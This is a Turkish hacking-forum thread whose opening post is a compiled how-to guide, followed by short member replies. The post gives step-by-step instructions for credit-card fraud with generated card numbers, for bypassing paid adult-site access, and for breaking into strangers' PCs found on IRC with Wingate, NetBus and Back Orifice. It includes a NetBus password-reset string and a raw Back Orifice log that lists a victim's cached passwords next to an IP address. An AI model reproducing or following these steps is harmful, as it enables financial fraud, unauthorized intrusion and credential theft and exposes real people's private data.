
Eveettt. Art&yacute;k
heyecanla beklenen an geldi. Fakat hack olay&yacute;ndan önce
tedbirlerimizi almal&yacute;y&yacute;z de&eth;il mi? ) &Yacute;lk olarak
analog bir hattan ba&eth;lanmaya çal&yacute;&thorn;&yacute;n. Isp'nizi
arayarak isp'nizin analog hat telefon numaras&yacute;n&yacute;
sorabilirsiniz. Daha sonra browser'&yacute;n&yacute;zda proxy
ayarlar&yacute;n&yacute;z&yacute; yap&yacute;n. Avrupa'da bulunan bir
proxy'yi kulllanmakta yarar var. Bütün bunlar&yacute; yapt&yacute;ktan
sonra bir sahte kredi kart&yacute; accsi bulmaya geldi s&yacute;ra.
Elinize baban&yacute;z&yacute;n veya annenizin kredi kart&yacute;n&yacute;
al&yacute;n. Sahte kredi kart&yacute; program&yacute;n&yacute;z&yacute;
çal&yacute;&thorn;t&yacute;r&yacute;n. Bu programlar&yacute; nette
heryerde bulabilirsiniz. E&eth;er hiç görmedim diyorsan&yacute;z,
yaz&yacute;n&yacute;n burdan sonras&yacute;n&yacute;
okumay&yacute;n&yacute;z. Sahte Kredi Kart&yacute; program&yacute;ndan
extrapolate tu&thorn;una bas&yacute;n ve önünüze gelen bo&thorn;
kutucu&eth;a sahip oldu&eth;unuz kredi kart&yacute;n&yacute;z&yacute;n
numaras&yacute;n&yacute; yaz&yacute;n. Daha sonra önünüze gelen
rakamlardan rastgele not edin. Bu arada kendi esas kredi
kart&yacute;n&yacute;z&yacute;n son kullanma tarihini de not edin. Buraya
kadar ba&thorn;ar&yacute;yla geldiyseniz i&thorn;lemin birinci bölümü
bitmi&thorn; demektir. Hadi geçmi&thorn; olsun.

Internette bir sürü
parayla domain, server... satan yerler vard&yacute;r. &Yacute;&thorn;te bu
adreslerden gazlamas&yacute; kolay olan bir adres verece&eth;im :
www.hostingdeals.com. Bu verdi&eth;im adres gerçekten çok gaz bir yerdir.
Yani 300 MB'lik bir alan&yacute; kolay bir &thorn;ekilde elde
edebilirsiniz. &Yacute;lla benim size verdi&eth;im bu adresi kullanmak
zorunda de&eth;ilsiniz tabi fakat gazlamaya bu kolay adresten
ba&thorn;larsan&yacute;z ilerde daha büyük kapasiteli yerlerde elde
edebilirsiniz. Bu da sizin kabiliyetinize kalm&yacute;&thorn; bir&thorn;ey
art&yacute;k. Ne demi&thorn;ler : Önce Emeklenir, Sonra Yürünür, Sonra
Ko&thorn;ulur... Az önce verdi&eth;im adrese gidin ve sign up linkine
t&yacute;klay&yacute;n. Kar&thorn;&yacute;n&yacute;za gelen pencereyi
mant&yacute;kl&yacute;-sallama bilgilerle doldurun. En önemlisi e-mail
adresinizi mutlaka do&eth;ru verin. Daha sonra devam edin.
Kar&thorn;&yacute;n&yacute;za 1-2 pencere daha ç&yacute;kacak
bunlar&yacute; da mant&yacute;kl&yacute;-sallama bilgilerle doldurun. Bu
arada verinizin yeteneklerini belirtece&eth;iniz bir pencere gelecek
buradan hepsini i&thorn;aretleyin ne de olsa bele&thorn; server,
her&thorn;eyi tamam olsun de&eth;il mi yani... Önemli : Fiyat Ödeme
&THORN;ekillerinden en sa&eth; alt kö&thorn;ede olan&yacute; seçin.Sonra
en önemli pencere geliyoruz : Paran&yacute;n ödenece&eth;i yer.
&Yacute;sim bölümüne zaten tikmen ismimiz yaz&yacute;l&yacute;r. Çünkü
daha önce bu bilgiyi vermi&thorn;tik. Kredi kart numaras&yacute; bölümüne
size daha önce not etmenizi istedi&eth;im numaralardan birini
yaz&yacute;n. Son kullanma tarihi bölümünü de size daha önce not etmenizi
istedi&eth;im son kullanma tarihini ay/y&yacute;l; format&yacute;nda
yazarak doldurun. Ve daha sonra done yap&yacute;p i&thorn;lemi bitirin.
300 MB'lik baba domain+serveriniz yakla&thorn;&yacute;k 24 saat içinde
aç&yacute;lacakt&yacute;r. Hepinize hay&yacute;rl&yacute; olsun.
Ba&thorn;ka yaz&yacute;larda görü&thorn;mek dile&eth;iyle...byez
byez...



ADULT SITE
HACK

INTERNETTE BIR SURU ADULT SITESI VAR VE
HEPSIDE BAZI SCRIPTLER JAVALAR VEYA REFERRER
KULLANARAK BIRBIRINE LINK VERIYOR BEN BIR HACKER DEGILIM AMA UFAK BAZI
IPUCLARI VEREBILIRIM
YAPMANIZ GEREKEN ILK IS BISEYLER YURUTMEK ISTEDIGINIZ SITENIN PASSWORD
UNUN ELDE ETMEK
BUNUN ICIN BIR SURU PASSWORD SITELERI
VAR YA BUNLARDAN ELDE EDERSINIZ PASSWORDLERI TABI SABIR ISI BU BEN AZIM
ETTIM BIR KAC TANE
BULDUM CALISAN PASSWORD BU SITE O SEKILDE YAPILMISTIR YADA TUM WAREZ
SITELERINDE CREDIT
MASTER 4 VE CARD PRO GIBI PROGRAMLAR DAGITILIR BUNLARIN ISLEVI SIZE
HAZIRDA BAZI KREDI KARTI
NUMARALARI VERIRLER AMA
ELBETTE KI BU VERDIKLERI NUMARALAR HICBIR ISE YARAMAZ YAPMANIZ GEREKEN
ONCELIKLE GERCEK BIR
KREDI KARTI BULMAKTIR VE BU KARTTAN O PROGRAM VASITASIYLA NUMARALAR
URETMEKTIR BU
PROGRAMLAR SIZE 1000
TANE FALAN KART URETIR. ISIN ASIL PUF NOKTASI SU, BU URETTIGINIZ KREDI
KARTLARI NIN HEPSININ
BITIS TARIHLERI AYNI BOYLECE ELINIZDEKI KARTI KULLANARAK SIFRE
ALABILIRSINIZ FAKAT DIKKAT
HICBIR SEKILDE EMAIL YADA KENDINIZI BELLI EDECEK BILGI VERMEYIN SADECE
SANAL ISLERINIZI O
APTAL ADULT SITELERINDEN PASSWORD ALMAK GIBI ISLERINIZI YAPIN BU
KESINLIKLE BIR SUC TESKIL
EDER SAKIN HERHANGI BIR MAL SIPARIS ETMEYIN BIRINDEN ALDIGIM BILGIYE GORE
NEYSE KI ADULT
SITELERI BU KARTLARDAN PARA CEKEMEMEKTEDIR CUNKU USTLERINDEKI ISIMLER
TUTMAZ BU IYI HABER
KIMSEYE ZARARINIZ YOK AMA BU ISI YAPMAYIN RISKI BUYUK.SAHTE ACCOUNT
KULLANMAYA DIKKAT EDIN.KIMLIK VERMEYIN VEYA www.anonymizer.com BU ADRESE
GIDIP BASVURUN IP
NUMARANIZI ONLAR SIZIN ICIN SAKLAYACAKLARDIR.

HERNEYSE BIR SITENIN PASSWORDUNU ELE GECIRDIKTEN SONRA SITEDE ARKA KAPI
(YANI SIFRESIZ BIR
YER) VAR MI DIYE KONTROL ETMEK YERINE BU ISI TELEPORT PRO ILE YAPIN TABI
SITEDEKI RESIMLERI
BULMAYA AYAPLAMAYIN TELEPORT PRO YU YOKSA ISINIZ UZUN SURER BUNLARI
TELEPORT PRO
VASITASIYLA CEKTIKTEN SONRA ELINIZLE
KONTROL EDIN OZELLIKLE MEMBERS DIYE BASLIYAN YERLER VAR ISE BU TIP YERLERI
GENELDE SIFRELIDIR
SIFRELI OLMAYABILIR AMA SANSINIZ VAR ISE SITEDE BASKA BIR YERE LINK
VERILMISSE MESELA SIZ
WWW.XXX.COM/MEMBERS TASINIZ ONLAR WWW.YYY.COM GIBI BIR YERE LINK VERMISLER
ISE ORANIN
BEDAVA OLMASI IHTIMALI VAR. EGER GIRILMIYORSA BOS BIR SAYFA CIKIYORSA
BUNLAR REFERER
KULLANIYORLAR DEMEKTIR ONLARI KIRMAYI DA ANLATACAGIM

ASLINDA ASIL AMACINIZ SITEDE CGI-BIN YADA CGI-WIN DIYE OLAN DOSYALARI
BULMAKTIR BUNLAR COK
BUYUK IHTIMALLE BASKA YERLERE VERDIKLERI REFERRER LINKLERINI YADAKENDI
SITELERINDEKI BEDAVA
GIRISLERI GOSTERIR MESELA SU ORNEKTEKI GIBI


http://www.clubwicked.com/cgi-bin/stryseek.cgi? head=index.html

bu mesela sitenin ana sayfasini acar eger
http://www.clubwicked.com/cgi-bin/stryseek.cgi? head=cinemax.html
derdeniz sitenin sinema sayfasina gidersiniz vb bunun gibi sitedeki
adreslere bakarak dolasirsiniz. BAZEN DE REFERER
KULLANMAK GEREKIR YANI SIZ ADRESI DIREKT YAZSANIZ GIREMEZSINIZ AMA O
ADRESTEN TIKLARSANIZ
GIRERSINIZ BEN YENI BIR YOL BULDUM BU COK KOLAY BIR YOL BOYLECE BUTUN
DUNYANIN SEX SITELERI
AYAGINIZIN DIBINDE BAKIN MESELA SU ADRES BIR ORNEK OLSUN
http://www.adultmagazine.com/cgi-bin/tv?page=1998/ 08/cover.html&ID=00409666
BAKIN AACIP GARIP BIR SURU SALAK ISARETLE DOLU BIR ADRES ONCE BU ADRESE
GIDIN SIZE MUTLAKA
INTERNAL SERVER ERROR HATASI VERECEK HEHE ASLINDA SIZ ICERDESINIZ SIZI
KANDIRIYO ADAM
GITMENIZ GEREKEN ADRES ASLINDA SU ISE TUM FAZLALIKLARI ATALIM BU ADRESE
GIREMEDINIZ SIMDI
AYNI SAYFADA FAZLALILLARI ATALIM VE
SOYLE YAZALIM
http://www.adultmagazine.com/1998/08/cover.html

cgi-bin i attim; /tv?page= i attim &ID=00409666 i attim boylece
sayfadayim

BAZI ADRESLER DE SIZIN NEREDEN GELDIGIZE BAKARAK SIZI HEMEN BASKA BIR
SAYFAYA GONDERMEYE
KALKARLAR NE YAPMANIZ GEREK O SIZI ISTEDIGI SAYFAYA GONDERMEDEN ONCE HEMEN
STOP A BASIN KI
O SAYFAYA GITMESIN O SAYFADA KALIN BU SAYFA SIZIN NEREDEN GELDIGINIZE
BAKARAK SIZI YA PARA
ISTEDIGI SAYFAYA YA DA GERCEK VIDEO YADA RESIM SAYFASINA GONDERIR OYLEYSE
BIZ STOP A BASIP
BIZI GONDERECEGI GERCEK RESIM VEYA VIDEO SAYFASNA GIDERIZ O KADAR MESELA

http://www.missx.com/live/liv.cgi?ty...ame=pics2.html

BU SAYFA SIZI HEMEN MEMBERS KLASORUNE ATMAYA CALISACAKTIR

HEMEN STOP A BASIN INTERNAL SERVER ERROR DIYINCE TABI IKI UC KERE O
SAYFADA KALIN EEE SIMDI
NEREYE GIDECEZ TABI KI ANA KLASORLERINE GIDELIM

http://www.missx.com/live/

YAZDIGIMIZ ZAMAN 100BINLERCE RESIM KARSIMIZDA NOT:BU HERIFLER ACAIP
DONEKTIR BEN BU YAZIYI
YAZARKEN BU OLAY CALISIYODU BU BIR ORNEKTIR LINKI
KAPAYABILIRLER



BILGISAYARA NASIL GIRILIR

Bu bolumde,
baskalar&yacute;n&yacute;n bilgisayar&yacute;na girme ve internet
sifrelerini calma olaylar&yacute;n&yacute; ogrenicez..
&Yacute;lk olarak bu olaylar&yacute; gerceklestirmek icin 4 adet programa
ihtiyacimiz var..Wingate,
Netbus,Bo, Telnet(her windowsun icinde vardir)..Diger programlari
cehennemin

&Yacute;lk olarak irc'de kendimize bir kurban secip, ip
numaras&yacute;n&yacute; al&yacute;yoruz (/dns nickname)..
Sonra wingate'i cal&yacute;st&yacute;r&yacute;yoruz..
"Hostname or Ip" yazan yere kurban&yacute;m&yacute;z&yacute;n ip
numaras&yacute;n&yacute; giriyoruz..
"Scan Port" k&yacute;sm&yacute;nda 23 seklindeki rakamlar&yacute; 12345
yap&yacute;yoruz sonra asag&yacute;dan
3. secenek olan try to open the port only" i secerek "scan!" butonuna
bas&yacute;yoruz..
"Servers found" k&yacute;sm&yacute;nda bir kac tane ip yazmas&yacute;
laz&yacute;m sansa bir tanesini secin..
Sonra netbus'&yacute; cal&yacute;st&yacute;r&yacute;p hostname/ip yazan
yere wingateden buldugunuz ipyi yaz&yacute;n..
Sifre isterse telnetten sifreyi k&yacute;rmam&yacute;z laz&yacute;m..Eger
sifre istemezse isiniz kolay...
Ben sifre istedi varsay&yacute;yorum ve anlatmaya devam...
Telnet her windowsta vardir...Bul (find) dan telnet'i buldurup
cal&yacute;st&yacute;r&yacute;n...
Baglana gelip uzaktaki sistem'e t&yacute;klay&yacute;n...
Ana bilgisyar ad&yacute;: wingatede buldugmuz ipyi yaz&yacute;yoruz
Baglant&yacute; Noktas&yacute; k&yacute;sm&yacute;na ise netbus portu olan
12345 yaziyoruz..baglana t&yacute;kl&yacute;yoruz..
yukarda netbus 1.6 veya 1.7 yazar..
simdi sifreyi kirmak icin
Password;1;123 ServerPwd;anatolia
bu yaz&yacute;y&yacute; pasteliyoruz...ve sifre cehennem oluyor,siz
sifreyi
cehennem yerine baska bir seylerde yapabilirsiniz..
Sonra bir daha netbus'a gidiyoruz art&yacute;k sifre anatolia
giriyoruz...Art&yacute;k adam&yacute;n
bilgisayr&yacute;nday&yacute;z..
file manager'a gelerek adama boserve.exe yi yolluyoruz...nereye
yolliycagimizi soruyor..
c:windows yazarak windowsun altina atiyoruz
yolladiktan sonra download ewkran&yacute;n&yacute; kapiyoruz..
start program diyoruz...c:windowsboserve.exe diyoruz...
tamam netbustaki isimizde bitti..
&THORN;imdi Back Orifice'ye geçiyoruz
target host orta adam&yacute;n ipsini yaz&yacute;yoruz..yan tarafada
12345
yan taraftan system passwordsu secip send e bas&yacute;yoruz ve bingoooo
bu ad&yacute;mda 10un ustunde password varmis..
Bo da dah cok sey yapabilirsiniz ama onlarida sonra anlatirimmm..
bu arada adamdan cikan passler
** 0 ing host packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 194.242.78.148 port 31337 ---------
!PONG!1.20!WINDOWS!
------------------------- End of Data -------------------
** 1 ystem passwords packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 194.242.78.148 port 31337 ---------
Password cached by system:
index:02(06) len:34(20/52)
Resource: 'crypt_Blizzard_Storm' Password: '›óå‘P'
index:09(19) len:52(41/22)
Resource: 'www.schoolgirls.com/restricted directory' Password: ':'
index:13(19) len:50(31/102)
Resource: 'www.sexxxfarm.com/members only' Password: 'burp:burp'
index:25(01) len:28(07/122)
Resource: 'WINDOWS' Password: 'PAKSOYKAROLAû'
index:00(06) len:74(53/122)
Resource: '*RnaAT&T WorldNet Service100000000@worldnet.att.net'
Password: 'aaaaaaaaaaaa'
index:04(06) len:68(50/92)
Resource: '*RnaMicrosoft Internet Referral Serviceicwsignup' Password:
'icwsignup9,'
index:07(06) len:44(27/82)
Resource: '*RnaTurk Nokta Netabaygan' Password: 'need-bob'
index:08(06) len:38(25/52)
Resource: '*RnaTurk Nokta Netburak' Password: 'burak '
index:10(06) len:22(14/02)
Resource: '*Rnasolamn&yacute;k' Password: '*'
index:05(06) len:42(27/72)
Resource: '*RnaTurk Nokta Netnecatit' Password: 'eynesil"'
index:11(06) len:34(19/62)
Resource: '*RnaAlnetersinari' Password: '987199$'
index:15(06) len:36(21/62)
Resource: '*RnaBurakrbayraktar' Password: '963963'
index:16(06) len:42(27/62)
Resource: '*RnaBa&eth;lant&yacute;m 5rbayraktar' Password: '963963.$'
index:17(06) len:36(19/82)
Resource: '*RnaBurakr1056700' Password: 'DABmvsVG•('
index:18(06) len:40(19/122)
Resource: '*RnaBurakdoganalp' Password: 'alpdogan<BR>ß '
index:19(06) len:18(10/02)
Resource: '*Rnanolur' Password: '$'
index:20(06) len:36(19/82)
Resource: '*RnaBurakb1000025' Password: 'ncVCjYFu¬ '
index:06(06) len:32(16/82)
Resource: '*RnaA&Yacute;DATAsuen' Password: '68913672$'
index:22(06) len:36(22/62)
Resource: '*RnaBa&eth;lant&yacute;m 4merko' Password: 'merko7.'
index:21(06) len:46(25/122)
Resource: '*RnaBa&eth;lant&yacute;m 7 baycenk' Password: 'gizlikorkunc'
index:23(06) len:28(19/12)
Resource: '*Rnabayrakbaycenk' Password: ' '
index:14(06) len:30(16/52)
Resource: '*RnaBurakburak' Password: 'burakì '
index:12(06) len:30(16/62)
Resource: '*RnaAlnetmerko' Password: 'merko7&'
index:24(06) len:38(17/122)
Resource: '*Rnacenkbaycenk' Password: 'paksoykarolaa'
index:01(04) len:18(05/52)
Resource: 'MAPI' Password: 'MAPI'
index:03(19) len:14(04/12)
Resource: 'NNTP' Password: ':'
End of cached passwords.
Unable to read value 'ScreenSave_Data'
------------------------- End of Data -------------------





SAVUNMA


Acilis konusmasi ile olaya
baslayalim;boyle bir sayfa yapma amacim kendini hacker sanan oysa sadece
elindeki bazi programlardan nuke atmaktan oteye gitmeyen
arkadaslara(Yani Lamer'lara) karsi onlem almak.Her ne kadar bu
arkadaslar hacker olmasada bu arkadaslarin elindeki programlarin verdigi
zaralari gos ard&yacute; etmemek gerek.

Oncelikle sik karsilastiginiz onemli
internet protokollerini aciklayalim IP internet protocol)20 byte
dan olusan internetteki her seyin tasindigi veri iletisim
protokoludur.Diger protokollerin hepsi bu protokolden tasinirve ve ip
nin sonuna eklenir.Ip nin icinde paket parcalama ofseti,izleyen protokolun
tipi,paketin canli kalacagi sure,kaynak ip adresi,hedef ip adresi gibi
alanalr vardir TCP Transmission Control Protokul)TCP,ana uzunlugu
20 byte olan
www,e-mail,irc gibi internette en cok kullanilan iletisim protokoludur
ICMP internet control messaging protokol)bu protokol teshis
etme ve mesejlasmayi iceririr.Bilgisayarlar arasindaki hat hizini ve
bilgisayarin
hatta olup olmadigini an&thorn;amak icin kullanilir.Mesala ping komutu ile
bunu yapabilir ilerleyen bolumlerde bu ozelligi kullanarak hattan dusmeyi
engelleyen bir program verecegim. IGMP internet group manegement
protokol)ismindende anlasildigi gibi bilgisayar gruplarina bilgi alinip
gonderilmesini saglar.&Yacute;nternet
uzerinde bir cok radyo bu protokolle yayin yapar. Simdide
saldiri icin kullanilan temel acikliklari inceleyelim
IP'nin zayif noktalari:Ip'nin en buyuk acik noktasi gelen ve giden
bilginin kaynaginin ve iceriginin kontrol edilmemesidir.Bu yolla yeterli
bir bilgi veya bazi programlarla bilgisayar yanlis bilgi gonderile-
rek bilgisayara hack edilebilir veya bilgisayar kilitlenebilir. Network
topolojisinin zayif noktalari:Eger network uzerinde anahtar
kullanmiyorsaniz gonderdiginiz bilgi tum aga ugrar.Bu durumdan belli bir
programlarla yaralanalinilabilir.Ornegin bu yontemle ag uzerinde
sizin yaptiginiz butun gorusmeler izlenebilir


pwl : password list


K&yacute;saca pwl(PassWord List)
dosyas&yacute;ndan bahsetmek istiyorum. Bu dosya windows95/98'deki tüm
cached ve kay&yacute;tl&yacute; password'lerin oldu&eth;u bir
dosyad&yacute;r. Yani kullan&yacute;c&yacute; internete ba&eth;lanmak için
ISP &thorn;ifresini yazacakt&yacute;r, bu &thorn;ifre büyük ihtimalle
bilgisayar&yacute;n haf&yacute;zas&yacute;nda yer edecektir ve .pwl
dosyas&yacute;nda da listelenecektir.

Bu dosya c:windows dizini alt&yacute;nda bulunur. Kullan&yacute;c&yacute;
ad&yacute;n&yacute;n ilk 8 karakteri ve .pwl uzant&yacute;s&yacute;ndan
olu&thorn;ur. Yani benim kullan&yacute;c&yacute; ad&yacute;m "PooLSharK"
ise pwl dosyam "poolshar.pwl"dir. Hatta &thorn;imdi kendinizinkini bile
hemen bulabilirsiniz. Tek yapman&yacute;z gereken c:windows dizinine
gidip pwl dosyas&yacute;n&yacute; bulmakt&yacute;r.

Ço&eth;u password burada listelenir. Ancak bir metin editörü (ör: notepad)
ile bu dosyay&yacute; açarsak içerisinde anlams&yacute;z karakterlerden
ba&thorn;ka bir&thorn;ey olmad&yacute;&eth;&yacute;n&yacute; görürürz.
Bunun nedeni ise &thorn;ifrelerin belirli bir algoritma ile kodlanarak
saklanmas&yacute;d&yacute;r. Evet aynen öyle, kullan&yacute;c&yacute;
&thorn;ifreleri &thorn;ifrelenmi&thorn; olarak bulunur. Yani .pwl
dosyas&yacute;n&yacute;n içindedir ancak anla&thorn;&yacute;l&yacute;r bir
&thorn;ekilde de&eth;ildir zira aynen a&thorn;a&eth;&yacute;daki gibidir:

–c. . .... .
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿR. . .
. . Î. . . . . . ×. —.QDæù0”Á.æ.õˆí.Ë&THORN;.„,{”¬M
.}.¤”[C.›. e¬€âUwØ.ž°ÅR‚’'õ¦qbt&Yacute;ózåº&Yacute;²½.†
“ûžu¶Üš§òo+.*á.ó.…0ÏC...&127;ÆûéDŠ
.6dU˜:ù
&yacute;.PsMS»V©EBʪ¡$ç¢Í!Õ.̝ßl± â.Ž”Léa4o.•2±çu°
éŠ.Îw‡û^l—¹ˆ§`×vm™.v
“a×`ԍžÛ5AȨ.Ì{a2P–ñÚ

(&THORN;ifrenin orjinalli&eth;ini bozmak
için onu biraz k&yacute;saltt&yacute;m, normalde daha uzun)

Ancak bir&thorn;ey eklemek istiyorum. Her zaman pwl
dosyas&yacute;n&yacute; k&yacute;rmak i&thorn;e yaramayabilir. Yani içi
bo&thorn; da olabilir. Bu demek olmuyor ki o ki&thorn;inin hiç
kay&yacute;tl&yacute; &thorn;ifresi yok. Tabii var ancak pwl
dosyas&yacute;na kaydedilmesine izin vermemi&thorn; olabilir. Örnek olarak
superonline kullan&yacute;c&yacute;lar&yacute;n&yacute;n ço&eth;unun
kulland&yacute;&eth;&yacute; Superonline Guide program&yacute;n&yacute;
ele alal&yacute;m. Bu program sizi otomatik olarak internete ba&eth;lamaya
yarar ve bunun içinde kullan&yacute;c&yacute; ad&yacute;n&yacute;z ve
parolay&yacute; program içerisindeki bir bölümde girmeniz gerekir. Program
sizin parolan&yacute;z&yacute; (&thorn;ifrenizi) nete her
ba&eth;lan&yacute;&thorn;&yacute;n&yacute;zda ISP'nize iletecektir ve
internet ba&eth;lant&yacute;s&yacute;n&yacute; kurarken username, password
gibi alanlar ile ilgilenmenize gerek kalmaz çünkü Superonline Guide bunu
sizin için yapar. Tamam yapar yapmas&yacute;na da nas&yacute;l yapar? Yani
bir kere programa username ve pw'ümüzü veriyoruz, o biz ne zaman istesek
kullan&yacute;yor bizim için. Tamam ama, bilgisayar&yacute; aç&yacute;p
kapatt&yacute;&eth;&yacute;m&yacute;z zaman nas&yacute;l oluyor da bizim
pw'ler uçup gitmiyor? Demek ki &thorn;ifrelerin bir yerde
kay&yacute;tl&yacute; olmas&yacute; gerekli. &Yacute;&thorn;te bu
&thorn;ifreler .pwl dosyas&yacute;nda saklan&yacute;yor. Program
&thorn;ifreye ihtiyaç duyunca oradan al&yacute;yor, kullan&yacute;yor.
Ancak daha demin dedim ki, pwl dosyas&yacute;n&yacute;n k&yacute;rmak her
zaman &thorn;ifrelerin aç&yacute;&eth;a ç&yacute;kmas&yacute;n&yacute;
sa&eth;lamaz. E&eth;er kullan&yacute;c&yacute; pw'lerini unutmamak için
veya sürekli pw girmekten b&yacute;kt&yacute;&eth;&yacute; için
yard&yacute;mc&yacute; bir program kullanm&yacute;yorsa (ör uperguide,
int.explorer'&yacute;n pw hat&yacute;rlatma özelli&eth;i vs) yani, her
seferinde &thorn;ifrelerini elle giriyorsa, bilgisyar&yacute;n diskini hiç
araya sokmuyorsa o zaman pw'ler pwl dosyas&yacute;na yaz&yacute;lamaz.
Çünkü kullan&yacute;c&yacute; onlar&yacute; biryere kaydettirmiyor. Her
seferinde el ile giriyor Şu Belirsiz Ruhlara Pek Kızgınım bütün saygısı onların, bir eziyettir, bütün övgüleri bıkkınlık ve utanç
IIbykArUsII - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2008
Nereden:
yaşaıp yaşamadığıma henüz karar veRemedim..!!!
Mesajlar:
184
Konular:
1
Teşekkür (Etti):
0
Teşekkür (Aldı):
2
Ticaret:
(0) %
21-04-2008 21:23
#2
ben bunları okuyacağıma gider sitenin telif hakkını satın alırım :P emeğe saygı
ph(-)my* - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2008
Mesajlar:
81
Konular:
1
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Ticaret:
(0) %
22-04-2008 15:02
#3
Exclamation
Alıntı:
IIbykArUsII´isimli üyeden Alıntı Mesajı göster
ben bunları okuyacağıma gider sitenin telif hakkını satın alırım :P emeğe saygı
Aynen. okuyupta zamanımı kaybedemem
atlas_tr - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2008
Nereden:
NErDe OLsam BEğeNİRsin
Mesajlar:
2.383
Konular:
389
Teşekkür (Etti):
19
Teşekkür (Aldı):
192
Ticaret:
(0) %
22-04-2008 15:49
#4
saol kardeş ama çok uzun bir yazı
s_e_t_u_g - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2007
Nereden:
UçURuMuN KeNaRıNDa...
Mesajlar:
178
Konular:
2
Teşekkür (Etti):
3
Teşekkür (Aldı):
1
Ticaret:
(0) %
22-04-2008 17:14
#5
KARDEŞ PAYLAŞIM İÇİN SAĞOL ELİNE EMEĞİNE SAĞLIK MAŞALLAH DESTAN GİBİ.)
---------------------

BAYRAKLARI BAYRAK YAPAN ÜSTÜNDEKİ KANDIR,

TOPRAK EĞER UĞRUNDA ÖLEN VARSA VATANDIR...
InTİKaM - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2007
Yaş:
41
Mesajlar:
951
Konular:
227
Teşekkür (Etti):
0
Teşekkür (Aldı):
21
Ticaret:
(0) %
22-04-2008 17:27
#6
Okuyarak Kaybedilen Zaman Bos Gecirilen Zamandan Daha Kiymetlidir. (Konunun iciregi her ne olursa olsun)Esasinda goz gezdirirseniz bildiginiz konular hep asagi yukari tekrardan zarar gelmez..
---------------------
Allah'im Yagmur Yagdir Yeryüzünde Pislik Cok
Euro 2008'de TURKIYE MILLI TAKIMINA BASARILAR

Kod:
Zaman Akip Gidiyor!Dur Demek Olmaz, Umudu Kaybedip Pes Etmek Hic Olmaz
Kod:
Zamanin Neresinde Neyin Gecmesinde Kaybolmusken Tam Yerinde Her sey Farazi
Ĭ Л Ĭ Ҝ ά lvl
indefinabLe - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2007
Nereden:
Monitörün Önünde..=)
Yaş:
69
Mesajlar:
843
Konular:
84
Teşekkür (Etti):
0
Teşekkür (Aldı):
25
Ticaret:
(0) %
22-04-2008 18:22
#7
Alıntı:
ph(-)my*´isimli üyeden Alıntı Mesajı göster
Aynen. okuyupta zamanımı kaybedemem
okuyacaksın ki öğreneceksin
indefinabLe - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2007
Nereden:
Monitörün Önünde..=)
Yaş:
69
Mesajlar:
843
Konular:
84
Teşekkür (Etti):
0
Teşekkür (Aldı):
25
Ticaret:
(0) %
22-04-2008 18:23
#8
neden zamanını boşa geçirmiş olacaksın ki
Pashaes - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
09/2007
Nereden:
Bursa
Mesajlar:
1.163
Konular:
0
Teşekkür (Etti):
4
Teşekkür (Aldı):
25
Ticaret:
(0) %
22-04-2008 22:02
#9
hack ıstegım kactı
InTİKaM - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2007
Yaş:
41
Mesajlar:
951
Konular:
227
Teşekkür (Etti):
0
Teşekkür (Aldı):
21
Ticaret:
(0) %
22-04-2008 22:08
#10
Alıntı:
burakfeat´isimli üyeden Alıntı Mesajı göster
neden zamanını boşa geçirmiş olacaksın ki
Helal olsun burakfeat ...
---------------------
Allah'im Yagmur Yagdir Yeryüzünde Pislik Cok
Euro 2008'de TURKIYE MILLI TAKIMINA BASARILAR

Kod:
Zaman Akip Gidiyor!Dur Demek Olmaz, Umudu Kaybedip Pes Etmek Hic Olmaz
Kod:
Zamanin Neresinde Neyin Gecmesinde Kaybolmusken Tam Yerinde Her sey Farazi
Ĭ Л Ĭ Ҝ ά lvl

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler